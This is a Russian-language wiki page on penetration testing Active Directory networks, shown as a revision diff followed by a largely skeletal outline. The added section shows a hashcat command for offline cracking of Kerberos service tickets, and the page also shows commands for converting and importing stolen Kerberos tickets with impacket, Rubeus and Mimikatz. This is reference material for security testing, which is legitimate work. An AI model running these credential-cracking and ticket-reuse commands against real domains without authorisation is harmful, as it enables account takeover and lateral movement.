Active directory — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м |
Drakylar (обсуждение | вклад) м (→Учетные данные) |
||
| Строка 41: | Строка 41: | ||
== Учетные данные == | == Учетные данные == | ||
| + | === Сетевой перебор учетных данных (пароля) === | ||
Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force | Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force | ||
| + | |||
| + | |||
| + | === Оффлайн перебор === | ||
| + | |||
| + | ==== TGS ==== | ||
| + | Если у вас есть TGS-ticket для доступа к сервису, то вы можете пробрутить пароль учетки от которой будет идти запрос. | ||
| + | |||
| + | Hashcat | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | hashcat -m 13100 --force -a0 ./tickget.kerberoast ./pass.txt | ||
| + | </syntaxhighlight> | ||
== TGT-билет == | == TGT-билет == | ||
Версия 20:19, 18 января 2022
Страница посвящена тестированию на проникновение сетей Active Directory на Windows OS.
Содержание
Общая информация о сети
Домен
Доменный контроллер
Доменные компьютеры
Дополнительная информация о сети
Список пользователей
Без перебора
С перебором
Время сети
NTP
HTTP
Сетевая информация
IP
Сервисы
Получение начального доступа
Анонимный доступ
Учетные данные
Сетевой перебор учетных данных (пароля)
Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force
Оффлайн перебор
TGS
Если у вас есть TGS-ticket для доступа к сервису, то вы можете пробрутить пароль учетки от которой будет идти запрос.
Hashcat
1 hashcat -m 13100 --force -a0 ./tickget.kerberoast ./pass.txt
TGT-билет
Как Cookie у браузера, он требуется для получения TGS который в свою очередь используется для подключения к сервисам. Если вы нашли файл с TGT-ключем, то у него есть два формата: kirbi & ccache, поэтому надо сконвертировать.
Конвертация
https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py
1 ./ticket_converter.py admin.ccache admin.kirbi
2 ./ticket_converter.py admin.kirbi admin.ccache
Импорт тикета
!Не забудьте установить время то же, пункт выше!
.ccache
Rubeus
1 .\Rubeus.exe ppt /ticket:new_ticket.ccache
Mimikatz
1 mimikatz # kerberos::ptt new_ticket.ccache
Bash
1 export KRB5CCNAME=./test.ccache
